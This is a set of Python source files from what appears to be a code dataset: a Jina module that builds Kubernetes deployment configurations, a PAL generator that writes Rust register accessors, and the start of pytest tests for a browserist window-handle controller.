cargs.uses = 'config.yml'
return construct_runtime_container_args(
cargs, uses_metas, uses_with, pod_type
)
def get_runtime_yamls(
self,
) -> List[Dict]:
cargs = copy.copy(self.deployment_args)
image_name = self._get_image_name(cargs.uses)
image_name_uses_before = (
self._get_image_name(cargs.uses_before)
if hasattr(cargs, 'uses_before') and cargs.uses_before
else None
)
image_name_uses_after = (
self._get_image_name(cargs.uses_after)
if hasattr(cargs, 'uses_after') and cargs.uses_after
else None
)
container_args = self._get_container_args(cargs, pod_type=self.pod_type)
container_args_uses_before = None
if getattr(cargs, 'uses_before', False):
uses_before_cargs = copy.copy(cargs)
uses_before_cargs.uses = cargs.uses_before
uses_before_cargs.name = f'{self.common_args.name}/uses-before'
uses_before_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE
uses_before_cargs.uses_before_address = None
uses_before_cargs.uses_after_address = None
uses_before_cargs.uses_before = None
uses_before_cargs.uses_after = None
uses_before_cargs.uses_with = None
uses_before_cargs.uses_metas = None
uses_before_cargs.env = None
uses_before_cargs.connection_list = None
uses_before_cargs.runtime_cls = 'WorkerRuntime'
uses_before_cargs.pod_role = PodRoleType.WORKER
uses_before_cargs.polling = None
container_args_uses_before = self._get_container_args(
uses_before_cargs, PodRoleType.WORKER
)
container_args_uses_after = None
if getattr(cargs, 'uses_after', False):
uses_after_cargs = copy.copy(cargs)
uses_after_cargs.uses = cargs.uses_after
uses_after_cargs.name = f'{self.common_args.name}/uses-after'
uses_after_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_AFTER
uses_after_cargs.uses_before_address = None
uses_after_cargs.uses_after_address = None
uses_after_cargs.uses_before = None
uses_after_cargs.uses_after = None
uses_after_cargs.uses_with = None
uses_after_cargs.uses_metas = None
uses_after_cargs.env = None
uses_after_cargs.connection_list = None
uses_after_cargs.runtime_cls = 'WorkerRuntime'
uses_after_cargs.pod_role = PodRoleType.WORKER
uses_after_cargs.polling = None
container_args_uses_after = self._get_container_args(
uses_after_cargs, PodRoleType.WORKER
)
return kubernetes_deployment.get_deployment_yamls(
self.dns_name,
namespace=self.k8s_namespace,
image_name=image_name,
image_name_uses_after=image_name_uses_after,
image_name_uses_before=image_name_uses_before,
container_cmd='["jina"]',
container_cmd_uses_before='["jina"]',
container_cmd_uses_after='["jina"]',
container_args=f'{container_args}',
container_args_uses_before=container_args_uses_before,
container_args_uses_after=container_args_uses_after,
replicas=self.num_replicas,
pull_policy='IfNotPresent',
jina_deployment_name=self.jina_deployment_name,
pod_type=self.pod_type,
shard_id=self.shard_id,
env=cargs.env,
gpus=cargs.gpus if hasattr(cargs, 'gpus') else None,
)
def __init__(
self,
args: Union['Namespace', Dict],
k8s_namespace: Optional[str] = None,
k8s_connection_pool: bool = True,
k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
):
# External Deployments should be ignored in a K8s based Flow
assert not (hasattr(args, 'external') and args.external)
if not validate_uses(args.uses):
raise NoContainerizedError(
f'Executor "{args.uses}" is not valid to be used in K8s. '
                'You need to use a containerized Executor. You may check `jina hub --help` to see how Jina Hub can help you build containerized Executors.'
)
self.k8s_namespace = k8s_namespace
self.k8s_connection_pool = k8s_connection_pool
self.k8s_deployments_addresses = k8s_deployments_addresses
self.head_deployment = None
self.args = copy.copy(args)
if k8s_namespace is not None:
# otherwise it will remain with the one from the original Deployment
self.args.k8s_namespace = k8s_namespace
self.args.k8s_connection_pool = k8s_connection_pool
self.name = self.args.name
self.deployment_args = self._get_deployment_args(self.args)
if self.deployment_args['head_deployment'] is not None:
self.head_deployment = self._K8sDeployment(
name=self.deployment_args['head_deployment'].name,
version=get_base_executor_version(),
shard_id=None,
jina_deployment_name=self.name,
common_args=self.args,
deployment_args=self.deployment_args['head_deployment'],
pod_type=PodRoleType.HEAD,
k8s_namespace=self.k8s_namespace,
k8s_connection_pool=self.k8s_connection_pool,
k8s_deployments_addresses=self.k8s_deployments_addresses,
)
self.worker_deployments = []
deployment_args = self.deployment_args['deployments']
for i, args in enumerate(deployment_args):
name = f'{self.name}-{i}' if len(deployment_args) > 1 else f'{self.name}'
self.worker_deployments.append(
self._K8sDeployment(
name=name,
version=get_base_executor_version(),
shard_id=i,
common_args=self.args,
deployment_args=args,
pod_type=PodRoleType.WORKER
if name != 'gateway'
else PodRoleType.GATEWAY,
jina_deployment_name=self.name,
k8s_namespace=self.k8s_namespace,
k8s_connection_pool=self.k8s_connection_pool,
k8s_deployments_addresses=self.k8s_deployments_addresses
if name == 'gateway'
else None,
)
)
def _get_deployment_args(self, args):
parsed_args = {
'head_deployment': None,
'deployments': [],
}
shards = getattr(args, 'shards', 1)
uses_before = getattr(args, 'uses_before', None)
uses_after = getattr(args, 'uses_after', None)
if args.name != 'gateway':
parsed_args['head_deployment'] = BaseDeployment._copy_to_head_args(
self.args
)
parsed_args['head_deployment'].gpus = None
parsed_args['head_deployment'].port = K8sGrpcConnectionPool.K8S_PORT
parsed_args['head_deployment'].uses = None
parsed_args['head_deployment'].uses_metas = None
parsed_args['head_deployment'].uses_with = None
parsed_args['head_deployment'].env = None
            # if the K8s connection pool is disabled, connections are wired up
            # manually through an explicit connection list on the head
if not self.k8s_connection_pool:
import json
connection_list = {}
for i in range(shards):
name = (
f'{to_compatible_name(self.name)}-{i}'
if shards > 1
else f'{to_compatible_name(self.name)}'
)
connection_list[
str(i)
] = f'{name}.{self.k8s_namespace}.svc:{K8sGrpcConnectionPool.K8S_PORT}'
parsed_args['head_deployment'].connection_list = json.dumps(
connection_list
)
if uses_before:
parsed_args[
'head_deployment'
].uses_before_address = (
f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE}'
)
if uses_after:
parsed_args[
'head_deployment'
].uses_after_address = (
f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_AFTER}'
)
for i in range(shards):
cargs = copy.deepcopy(args)
cargs.shard_id = i
cargs.uses_before = None
cargs.uses_after = None
if args.name != 'gateway':
cargs.port = K8sGrpcConnectionPool.K8S_PORT
cargs.uses_before_address = None
cargs.uses_after_address = None
if shards > 1:
cargs.name = f'{cargs.name}-{i}'
            if args.name == 'gateway':
                cargs.pod_role = PodRoleType.GATEWAY
                # worker runtimes do not care about the pod role, so it is only
                # set explicitly for the gateway
            else:
                cargs.k8s_connection_pool = False
parsed_args['deployments'].append(cargs)
return parsed_args
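
    # For reference (values illustrative, not taken from this file): with
    # shards=2, name='encoder' and k8s_namespace='demo', the head's
    # connection_list built above is a JSON mapping of shard id to in-cluster
    # address, e.g. {"0": "encoder-0.demo.svc:<K8S_PORT>",
    # "1": "encoder-1.demo.svc:<K8S_PORT>"}, where <K8S_PORT> stands for
    # K8sGrpcConnectionPool.K8S_PORT.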
def to_k8s_yaml(
self,
) -> List[Tuple[str, List[Dict]]]:
"""
Return a list of dictionary configurations. One for each deployment in this Deployment
.. # noqa: DAR201
.. # noqa: DAR101
"""
if self.name == 'gateway':
return [
(
'gateway',
self.worker_deployments[0].get_gateway_yamls(),
)
]
else:
deployments = [self.head_deployment]
deployments.extend(self.worker_deployments)
return [
(
deployment.dns_name,
deployment.get_runtime_yamls(),
)
for deployment in deployments
]
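
# A minimal usage sketch (illustrative addition, not part of the original
# module). It assumes `set_deployment_parser` is exposed by `jina.parsers` in
# this Jina version and that PyYAML is installed; the executor URI, namespace,
# and file layout are placeholders.
if __name__ == '__main__':
    import yaml
    from jina.parsers import set_deployment_parser

    args = set_deployment_parser().parse_args(['--uses', 'docker://my-executor'])
    config = K8sDeploymentConfig(args, k8s_namespace='demo-namespace')
    for dns_name, yaml_dicts in config.to_k8s_yaml():
        # one multi-document YAML file per deployment
        with open(f'{dns_name}.yml', 'w') as fp:
            yaml.safe_dump_all(yaml_dicts, fp)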
| 40.485014
| 158
| 0.573428
|
import copy
from argparse import Namespace
from typing import Dict, Union, List, Optional, Tuple
from jina import __default_executor__
from jina.enums import PodRoleType
from jina.excepts import NoContainerizedError
from jina.orchestrate.deployments.config.k8slib import kubernetes_deployment
from jina.orchestrate.deployments.config.helper import (
get_image_name,
to_compatible_name,
get_base_executor_version,
construct_runtime_container_args,
validate_uses,
)
from jina.serve.networking import K8sGrpcConnectionPool
from jina.orchestrate.deployments import BaseDeployment
class K8sDeploymentConfig:
class _K8sDeployment:
def __init__(
self,
name: str,
version: str,
pod_type: PodRoleType,
jina_deployment_name: str,
shard_id: Optional[int],
common_args: Union['Namespace', Dict],
deployment_args: Union['Namespace', Dict],
k8s_namespace: str,
k8s_connection_pool: bool = True,
k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
):
self.name = name
self.dns_name = to_compatible_name(name)
self.version = version
self.pod_type = pod_type
self.jina_deployment_name = jina_deployment_name
self.shard_id = shard_id
self.common_args = common_args
self.deployment_args = deployment_args
self.num_replicas = getattr(self.deployment_args, 'replicas', 1)
self.k8s_namespace = k8s_namespace
self.k8s_connection_pool = k8s_connection_pool
self.k8s_deployments_addresses = k8s_deployments_addresses
def get_gateway_yamls(
self,
) -> List[Dict]:
import os
test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
image_name = (
'jinaai/jina:test-pip'
if test_pip
else f'jinaai/jina:{self.version}-py38-standard'
)
cargs = copy.copy(self.deployment_args)
cargs.env = None
cargs.deployments_addresses = self.k8s_deployments_addresses
from jina.helper import ArgNamespace
from jina.parsers import set_gateway_parser
taboo = {
'uses_with',
'uses_metas',
'volumes',
'uses_before',
'uses_after',
'workspace',
'workspace_id',
'upload_files',
'noblock_on_start',
}
non_defaults = ArgNamespace.get_non_defaults_args(
cargs, set_gateway_parser(), taboo=taboo
)
_args = ArgNamespace.kwargs2list(non_defaults)
container_args = ['gateway'] + _args
if not cargs.k8s_connection_pool:
container_args.append('--k8s-disable-connection-pool')
return kubernetes_deployment.get_deployment_yamls(
self.dns_name,
namespace=self.k8s_namespace,
image_name=image_name,
container_cmd='["jina"]',
container_args=f'{container_args}',
replicas=1,
pull_policy='IfNotPresent',
jina_deployment_name='gateway',
pod_type=self.pod_type,
port=self.common_args.port,
env=cargs.env,
)
def _get_image_name(self, uses: Optional[str]):
import os
test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
image_name = (
'jinaai/jina:test-pip'
if test_pip
else f'jinaai/jina:{self.version}-py38-perf'
)
if uses is not None and uses != __default_executor__:
image_name = get_image_name(uses)
return image_name
def _get_container_args(self, cargs, pod_type):
uses_metas = cargs.uses_metas or {}
uses_with = self.deployment_args.uses_with
if cargs.uses != __default_executor__:
cargs.uses = 'config.yml'
return construct_runtime_container_args(
cargs, uses_metas, uses_with, pod_type
)
def get_runtime_yamls(
self,
) -> List[Dict]:
cargs = copy.copy(self.deployment_args)
image_name = self._get_image_name(cargs.uses)
image_name_uses_before = (
self._get_image_name(cargs.uses_before)
if hasattr(cargs, 'uses_before') and cargs.uses_before
else None
)
image_name_uses_after = (
self._get_image_name(cargs.uses_after)
if hasattr(cargs, 'uses_after') and cargs.uses_after
else None
)
container_args = self._get_container_args(cargs, pod_type=self.pod_type)
container_args_uses_before = None
if getattr(cargs, 'uses_before', False):
uses_before_cargs = copy.copy(cargs)
uses_before_cargs.uses = cargs.uses_before
uses_before_cargs.name = f'{self.common_args.name}/uses-before'
uses_before_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE
uses_before_cargs.uses_before_address = None
uses_before_cargs.uses_after_address = None
uses_before_cargs.uses_before = None
uses_before_cargs.uses_after = None
uses_before_cargs.uses_with = None
uses_before_cargs.uses_metas = None
uses_before_cargs.env = None
uses_before_cargs.connection_list = None
uses_before_cargs.runtime_cls = 'WorkerRuntime'
uses_before_cargs.pod_role = PodRoleType.WORKER
uses_before_cargs.polling = None
container_args_uses_before = self._get_container_args(
uses_before_cargs, PodRoleType.WORKER
)
container_args_uses_after = None
if getattr(cargs, 'uses_after', False):
uses_after_cargs = copy.copy(cargs)
uses_after_cargs.uses = cargs.uses_after
uses_after_cargs.name = f'{self.common_args.name}/uses-after'
uses_after_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_AFTER
uses_after_cargs.uses_before_address = None
uses_after_cargs.uses_after_address = None
uses_after_cargs.uses_before = None
uses_after_cargs.uses_after = None
uses_after_cargs.uses_with = None
uses_after_cargs.uses_metas = None
uses_after_cargs.env = None
uses_after_cargs.connection_list = None
uses_after_cargs.runtime_cls = 'WorkerRuntime'
uses_after_cargs.pod_role = PodRoleType.WORKER
uses_after_cargs.polling = None
container_args_uses_after = self._get_container_args(
uses_after_cargs, PodRoleType.WORKER
)
return kubernetes_deployment.get_deployment_yamls(
self.dns_name,
namespace=self.k8s_namespace,
image_name=image_name,
image_name_uses_after=image_name_uses_after,
image_name_uses_before=image_name_uses_before,
container_cmd='["jina"]',
container_cmd_uses_before='["jina"]',
container_cmd_uses_after='["jina"]',
container_args=f'{container_args}',
container_args_uses_before=container_args_uses_before,
container_args_uses_after=container_args_uses_after,
replicas=self.num_replicas,
pull_policy='IfNotPresent',
jina_deployment_name=self.jina_deployment_name,
pod_type=self.pod_type,
shard_id=self.shard_id,
env=cargs.env,
gpus=cargs.gpus if hasattr(cargs, 'gpus') else None,
)
def __init__(
self,
args: Union['Namespace', Dict],
k8s_namespace: Optional[str] = None,
k8s_connection_pool: bool = True,
k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
):
assert not (hasattr(args, 'external') and args.external)
if not validate_uses(args.uses):
raise NoContainerizedError(
f'Executor "{args.uses}" is not valid to be used in K8s. '
                'You need to use a containerized Executor. You may check `jina hub --help` to see how Jina Hub can help you build containerized Executors.'
)
self.k8s_namespace = k8s_namespace
self.k8s_connection_pool = k8s_connection_pool
self.k8s_deployments_addresses = k8s_deployments_addresses
self.head_deployment = None
self.args = copy.copy(args)
if k8s_namespace is not None:
self.args.k8s_namespace = k8s_namespace
self.args.k8s_connection_pool = k8s_connection_pool
self.name = self.args.name
self.deployment_args = self._get_deployment_args(self.args)
if self.deployment_args['head_deployment'] is not None:
self.head_deployment = self._K8sDeployment(
name=self.deployment_args['head_deployment'].name,
version=get_base_executor_version(),
shard_id=None,
jina_deployment_name=self.name,
common_args=self.args,
deployment_args=self.deployment_args['head_deployment'],
pod_type=PodRoleType.HEAD,
k8s_namespace=self.k8s_namespace,
k8s_connection_pool=self.k8s_connection_pool,
k8s_deployments_addresses=self.k8s_deployments_addresses,
)
self.worker_deployments = []
deployment_args = self.deployment_args['deployments']
for i, args in enumerate(deployment_args):
name = f'{self.name}-{i}' if len(deployment_args) > 1 else f'{self.name}'
self.worker_deployments.append(
self._K8sDeployment(
name=name,
version=get_base_executor_version(),
shard_id=i,
common_args=self.args,
deployment_args=args,
pod_type=PodRoleType.WORKER
if name != 'gateway'
else PodRoleType.GATEWAY,
jina_deployment_name=self.name,
k8s_namespace=self.k8s_namespace,
k8s_connection_pool=self.k8s_connection_pool,
k8s_deployments_addresses=self.k8s_deployments_addresses
if name == 'gateway'
else None,
)
)
def _get_deployment_args(self, args):
parsed_args = {
'head_deployment': None,
'deployments': [],
}
shards = getattr(args, 'shards', 1)
uses_before = getattr(args, 'uses_before', None)
uses_after = getattr(args, 'uses_after', None)
if args.name != 'gateway':
parsed_args['head_deployment'] = BaseDeployment._copy_to_head_args(
self.args
)
parsed_args['head_deployment'].gpus = None
parsed_args['head_deployment'].port = K8sGrpcConnectionPool.K8S_PORT
parsed_args['head_deployment'].uses = None
parsed_args['head_deployment'].uses_metas = None
parsed_args['head_deployment'].uses_with = None
parsed_args['head_deployment'].env = None
if not self.k8s_connection_pool:
import json
connection_list = {}
for i in range(shards):
name = (
f'{to_compatible_name(self.name)}-{i}'
if shards > 1
else f'{to_compatible_name(self.name)}'
)
connection_list[
str(i)
] = f'{name}.{self.k8s_namespace}.svc:{K8sGrpcConnectionPool.K8S_PORT}'
parsed_args['head_deployment'].connection_list = json.dumps(
connection_list
)
if uses_before:
parsed_args[
'head_deployment'
].uses_before_address = (
f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE}'
)
if uses_after:
parsed_args[
'head_deployment'
].uses_after_address = (
f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_AFTER}'
)
for i in range(shards):
cargs = copy.deepcopy(args)
cargs.shard_id = i
cargs.uses_before = None
cargs.uses_after = None
if args.name != 'gateway':
cargs.port = K8sGrpcConnectionPool.K8S_PORT
cargs.uses_before_address = None
cargs.uses_after_address = None
if shards > 1:
cargs.name = f'{cargs.name}-{i}'
if args.name == 'gateway':
cargs.pod_role = PodRoleType.GATEWAY
else:
cargs.k8s_connection_pool = False
parsed_args['deployments'].append(cargs)
return parsed_args
def to_k8s_yaml(
self,
) -> List[Tuple[str, List[Dict]]]:
if self.name == 'gateway':
return [
(
'gateway',
self.worker_deployments[0].get_gateway_yamls(),
)
]
else:
deployments = [self.head_deployment]
deployments.extend(self.worker_deployments)
return [
(
deployment.dns_name,
deployment.get_runtime_yamls(),
)
for deployment in deployments
]
| true
| true
|
790dd77e78274904638c9891f524368b9cccc01a
| 6,422
|
py
|
Python
|
pal/generator/rust_generator.py
|
mars-research/pal
|
5977394cda8750ff5dcb89c2bf193ec1ef4cd137
|
[
"MIT"
] | null | null | null |
pal/generator/rust_generator.py
|
mars-research/pal
|
5977394cda8750ff5dcb89c2bf193ec1ef4cd137
|
[
"MIT"
] | 1
|
2021-08-23T15:54:10.000Z
|
2021-09-28T12:44:36.000Z
|
pal/generator/rust_generator.py
|
mars-research/pal
|
5977394cda8750ff5dcb89c2bf193ec1ef4cd137
|
[
"MIT"
] | null | null | null |
import os
import pathlib
from pal.generator.abstract_generator import AbstractGenerator
from pal.logger import logger
from pal.exception import PalGeneratorException
from pal.filter import filters
from pal.transform import transforms
class RustGenerator(AbstractGenerator):
def generate_registers(self, regs, outpath):
try:
regs = transforms["remove_reserved_0"].transform(regs)
regs = transforms["remove_reserved_1"].transform(regs)
regs = transforms["remove_reserved_sign_extended"].transform(regs)
regs = transforms["remove_implementation_defined"].transform(regs)
regs = transforms["special_to_underscore"].transform(regs)
regs = transforms["insert_valid_first_character"].transform(regs)
regs = transforms["remove_redundant_am"].transform(regs)
regs = transforms["remove_redundant_fields"].transform(regs)
regs = transforms["unique_fieldset_names"].transform(regs)
regs = filters["no_access_mechanism"].filter_exclusive(regs)
regs = filters["irregular_size"].filter_exclusive(regs)
logger.info("Generating Rust register accessors to: " + str(outpath))
for reg in regs:
outfile_path = os.path.join(outpath, reg.name.lower() + ".rs")
outfile_path = os.path.abspath(outfile_path)
with open(outfile_path, "w") as outfile:
self._generate_register(outfile, reg)
self.__update_module_files(outpath)
self.__update_lib_file(outpath)
except Exception as e:
msg = "{g} failed to generate output {out}: {exception}".format(
g=str(type(self).__name__),
out=outpath,
exception=e)
raise PalGeneratorException(msg)
def generate_instructions(self, instructions, outpath):
try:
logger.info("Generating Rust instruction accessors to: " + str(outpath))
for inst in instructions:
outfile_path = os.path.join(outpath, inst.name.lower() + ".rs")
outfile_path = os.path.abspath(outfile_path)
with open(outfile_path, "w") as outfile:
self._generate_instruction(outfile, inst)
self.__update_module_files(outpath)
self.__update_lib_file(outpath)
except Exception as e:
msg = "{g} failed to generate output {out}: {exception}".format(
g=str(type(self).__name__),
out=outpath,
exception=e)
raise PalGeneratorException(msg)
def _generate_register(self, outfile, reg):
self.writer.declare_register_dependencies(outfile, reg, self.config)
        if self.config.enable_printers:
self.writer.declare_print_mechanism_dependencies(outfile, reg)
for am_key, am_list in reg.access_mechanisms.items():
for am in am_list:
self.writer.declare_access_mechanism_dependencies(outfile, reg, am)
self.writer.write_newline(outfile)
self._generate_register_comment(outfile, reg)
self.writer.declare_register_accessors(outfile, reg)
for idx, fieldset in enumerate(reg.fieldsets):
if fieldset.condition:
self.writer.declare_comment(outfile, fieldset.condition, 79)
for field in fieldset.fields:
self.writer.declare_field_accessors(outfile, reg, field)
                if self.config.enable_printers:
self.writer.declare_field_printers(outfile, reg, field)
            if reg.is_readable() and self.config.enable_printers:
self.writer.declare_fieldset_printers(outfile, reg, fieldset)
def _generate_instruction(self, outfile, inst):
self.writer.declare_instruction_dependencies(outfile, inst, self.config)
self.writer.declare_instruction_accessor(outfile, inst)
self.writer.write_newline(outfile)
def _generate_register_comment(self, outfile, reg):
comment = "{name} ({long_name}){separator}{purpose}".format(
name=str(reg.name),
long_name=str(reg.long_name),
separator=" - " if reg.purpose else "",
purpose=str(reg.purpose)
)
self.writer.declare_comment(outfile, comment, 75)
def __update_module_files(self, outpath):
modfile_path = os.path.join(outpath, "mod.rs")
modfile_path = os.path.abspath(modfile_path)
for root, dirs, files in os.walk(outpath):
logger.info("Updating modfile: " + os.path.join(root, "mod.rs"))
with open(os.path.join(root, "mod.rs"), "w") as modfile:
for name in sorted(files):
if name != "mod.rs" and name.endswith(".rs"):
modname = os.path.splitext(name)[0]
modfile.write("pub mod " + modname + ";")
self.writer.write_newline(modfile)
modfile.write("pub use " + modname + "::*;")
self.writer.write_newline(modfile)
for name in sorted(dirs):
modname = os.path.splitext(name)[0]
modfile.write("pub mod " + modname + ";")
self.writer.write_newline(modfile)
modfile.write("pub use " + modname + "::*;")
self.writer.write_newline(modfile)
def __update_lib_file(self, outpath):
libfile_path = os.path.abspath(os.path.join(outpath, "lib.rs"))
libfile_dir = os.path.abspath(outpath)
if not os.path.exists(libfile_path):
libfile_path = os.path.abspath(os.path.join(outpath, "../lib.rs"))
libfile_dir = os.path.abspath(os.path.join(outpath, "../"))
if not os.path.exists(libfile_path):
return
logger.info("Updating lib.rs: " + str(libfile_path))
with open(libfile_path, "w") as libfile:
for child in [f.path for f in os.scandir(libfile_dir)]:
logger.info("child: " + str(child))
modname = os.path.splitext(os.path.basename(child))[0]
                if modname != "lib":
libfile.write("pub mod " + modname + ";")
self.writer.write_newline(libfile)
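
# A standalone sketch (illustrative addition, not part of the original module)
# of the mod.rs layout that __update_module_files enforces: one
# `pub mod`/`pub use` pair per generated .rs file. File names are hypothetical.
if __name__ == "__main__":
    import tempfile
    from pathlib import Path

    tmp = Path(tempfile.mkdtemp())
    for name in ("cntr_el0.rs", "sctlr_el1.rs"):
        (tmp / name).write_text("// generated register accessor\n")
    lines = []
    for stem in sorted(p.stem for p in tmp.glob("*.rs") if p.name != "mod.rs"):
        lines.append(f"pub mod {stem};")
        lines.append(f"pub use {stem}::*;")
    (tmp / "mod.rs").write_text("\n".join(lines) + "\n")
    print((tmp / "mod.rs").read_text())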
| 42.25
| 84
| 0.608066
|
import os
import pathlib
from pal.generator.abstract_generator import AbstractGenerator
from pal.logger import logger
from pal.exception import PalGeneratorException
from pal.filter import filters
from pal.transform import transforms
class RustGenerator(AbstractGenerator):
def generate_registers(self, regs, outpath):
try:
regs = transforms["remove_reserved_0"].transform(regs)
regs = transforms["remove_reserved_1"].transform(regs)
regs = transforms["remove_reserved_sign_extended"].transform(regs)
regs = transforms["remove_implementation_defined"].transform(regs)
regs = transforms["special_to_underscore"].transform(regs)
regs = transforms["insert_valid_first_character"].transform(regs)
regs = transforms["remove_redundant_am"].transform(regs)
regs = transforms["remove_redundant_fields"].transform(regs)
regs = transforms["unique_fieldset_names"].transform(regs)
regs = filters["no_access_mechanism"].filter_exclusive(regs)
regs = filters["irregular_size"].filter_exclusive(regs)
logger.info("Generating Rust register accessors to: " + str(outpath))
for reg in regs:
outfile_path = os.path.join(outpath, reg.name.lower() + ".rs")
outfile_path = os.path.abspath(outfile_path)
with open(outfile_path, "w") as outfile:
self._generate_register(outfile, reg)
self.__update_module_files(outpath)
self.__update_lib_file(outpath)
except Exception as e:
msg = "{g} failed to generate output {out}: {exception}".format(
g=str(type(self).__name__),
out=outpath,
exception=e)
raise PalGeneratorException(msg)
def generate_instructions(self, instructions, outpath):
try:
logger.info("Generating Rust instruction accessors to: " + str(outpath))
for inst in instructions:
outfile_path = os.path.join(outpath, inst.name.lower() + ".rs")
outfile_path = os.path.abspath(outfile_path)
with open(outfile_path, "w") as outfile:
self._generate_instruction(outfile, inst)
self.__update_module_files(outpath)
self.__update_lib_file(outpath)
except Exception as e:
msg = "{g} failed to generate output {out}: {exception}".format(
g=str(type(self).__name__),
out=outpath,
exception=e)
raise PalGeneratorException(msg)
def _generate_register(self, outfile, reg):
self.writer.declare_register_dependencies(outfile, reg, self.config)
        if self.config.enable_printers:
self.writer.declare_print_mechanism_dependencies(outfile, reg)
for am_key, am_list in reg.access_mechanisms.items():
for am in am_list:
self.writer.declare_access_mechanism_dependencies(outfile, reg, am)
self.writer.write_newline(outfile)
self._generate_register_comment(outfile, reg)
self.writer.declare_register_accessors(outfile, reg)
for idx, fieldset in enumerate(reg.fieldsets):
if fieldset.condition:
self.writer.declare_comment(outfile, fieldset.condition, 79)
for field in fieldset.fields:
self.writer.declare_field_accessors(outfile, reg, field)
                if self.config.enable_printers:
self.writer.declare_field_printers(outfile, reg, field)
            if reg.is_readable() and self.config.enable_printers:
self.writer.declare_fieldset_printers(outfile, reg, fieldset)
def _generate_instruction(self, outfile, inst):
self.writer.declare_instruction_dependencies(outfile, inst, self.config)
self.writer.declare_instruction_accessor(outfile, inst)
self.writer.write_newline(outfile)
def _generate_register_comment(self, outfile, reg):
comment = "{name} ({long_name}){separator}{purpose}".format(
name=str(reg.name),
long_name=str(reg.long_name),
separator=" - " if reg.purpose else "",
purpose=str(reg.purpose)
)
self.writer.declare_comment(outfile, comment, 75)
def __update_module_files(self, outpath):
modfile_path = os.path.join(outpath, "mod.rs")
modfile_path = os.path.abspath(modfile_path)
for root, dirs, files in os.walk(outpath):
logger.info("Updating modfile: " + os.path.join(root, "mod.rs"))
with open(os.path.join(root, "mod.rs"), "w") as modfile:
for name in sorted(files):
if name != "mod.rs" and name.endswith(".rs"):
modname = os.path.splitext(name)[0]
modfile.write("pub mod " + modname + ";")
self.writer.write_newline(modfile)
modfile.write("pub use " + modname + "::*;")
self.writer.write_newline(modfile)
for name in sorted(dirs):
modname = os.path.splitext(name)[0]
modfile.write("pub mod " + modname + ";")
self.writer.write_newline(modfile)
modfile.write("pub use " + modname + "::*;")
self.writer.write_newline(modfile)
def __update_lib_file(self, outpath):
libfile_path = os.path.abspath(os.path.join(outpath, "lib.rs"))
libfile_dir = os.path.abspath(outpath)
if not os.path.exists(libfile_path):
libfile_path = os.path.abspath(os.path.join(outpath, "../lib.rs"))
libfile_dir = os.path.abspath(os.path.join(outpath, "../"))
if not os.path.exists(libfile_path):
return
logger.info("Updating lib.rs: " + str(libfile_path))
with open(libfile_path, "w") as libfile:
for child in [f.path for f in os.scandir(libfile_dir)]:
logger.info("child: " + str(child))
modname = os.path.splitext(os.path.basename(child))[0]
                if modname != "lib":
libfile.write("pub mod " + modname + ";")
self.writer.write_newline(libfile)
| true
| true
|
790dd884584a8f5b70472b478f3fbd6d4b1e067e
| 1,498
|
py
|
Python
|
test/browser/window/controller/remove_handle_by_id_test.py
|
jakob-bagterp/browserist
|
76bd916dd217b7da3759fd6ec3374191002dc091
|
[
"Apache-2.0"
] | 2
|
2022-02-20T10:03:19.000Z
|
2022-03-22T11:17:10.000Z
|
test/browser/window/controller/remove_handle_by_id_test.py
|
jakob-bagterp/browserist
|
76bd916dd217b7da3759fd6ec3374191002dc091
|
[
"Apache-2.0"
] | null | null | null |
test/browser/window/controller/remove_handle_by_id_test.py
|
jakob-bagterp/browserist
|
76bd916dd217b7da3759fd6ec3374191002dc091
|
[
"Apache-2.0"
] | null | null | null |
from contextlib import nullcontext as does_not_raise
from typing import Any
import pytest
from _mock_data.window_handles import WINDOW_HANDLE_1_ID, WINDOW_HANDLE_4_ID
from browserist.exception.window_handle import WindowHandleIdNotFoundError, WindowHandleIdNotValidError
from browserist.model.window.controller import WindowHandleController
@pytest.mark.parametrize("id", [
(WINDOW_HANDLE_1_ID),
])
def test_window_handle_controller_remove_handle_by_id(id: str, window_handle_controller: WindowHandleController) -> None:
assert window_handle_controller.count() == 3
window_handle_controller.remove_handle_by_id(id)
assert window_handle_controller.count() == 2
@pytest.mark.parametrize("id, expectation", [
(WINDOW_HANDLE_1_ID, does_not_raise()),
("Not valid ID", pytest.raises(WindowHandleIdNotValidError)),
])
def test_window_handle_controller_remove_handle_by_id_invalid_error(id: str, expectation: Any, window_handle_controller: WindowHandleController) -> None:
with expectation:
        window_handle_controller.remove_handle_by_id(id)
@pytest.mark.parametrize("id, expectation", [
(WINDOW_HANDLE_1_ID, does_not_raise()),
(WINDOW_HANDLE_4_ID, pytest.raises(WindowHandleIdNotFoundError)),
])
def test_window_handle_controller_remove_handle_by_id_not_found_error(id: str, expectation: Any, window_handle_controller: WindowHandleController) -> None:
with expectation:
        window_handle_controller.remove_handle_by_id(id)
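
# The tests above rely on a `window_handle_controller` fixture that yields a
# controller preloaded with exactly three handles. A rough sketch of such a
# fixture is given below; the `add_handle` helper, its signature, and the
# extra WINDOW_HANDLE_*_ID constants are assumptions about the conftest, not
# part of this file:
#
#   @pytest.fixture
#   def window_handle_controller() -> WindowHandleController:
#       controller = WindowHandleController()
#       for handle_id in (WINDOW_HANDLE_1_ID, WINDOW_HANDLE_2_ID, WINDOW_HANDLE_3_ID):
#           controller.add_handle(handle_id)  # hypothetical helper
#       return controller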
| 41.611111
| 155
| 0.814419
|
from contextlib import nullcontext as does_not_raise
from typing import Any
import pytest
from _mock_data.window_handles import WINDOW_HANDLE_1_ID, WINDOW_HANDLE_4_ID
from browserist.exception.window_handle import WindowHandleIdNotFoundError, WindowHandleIdNotValidError
from browserist.model.window.controller import WindowHandleController
@pytest.mark.parametrize("id", [
(WINDOW_HANDLE_1_ID),
])
def test_window_handle_controller_remove_handle_by_id(id: str, window_handle_controller: WindowHandleController) -> None:
assert window_handle_controller.count() == 3
window_handle_controller.remove_handle_by_id(id)
assert window_handle_controller.count() == 2
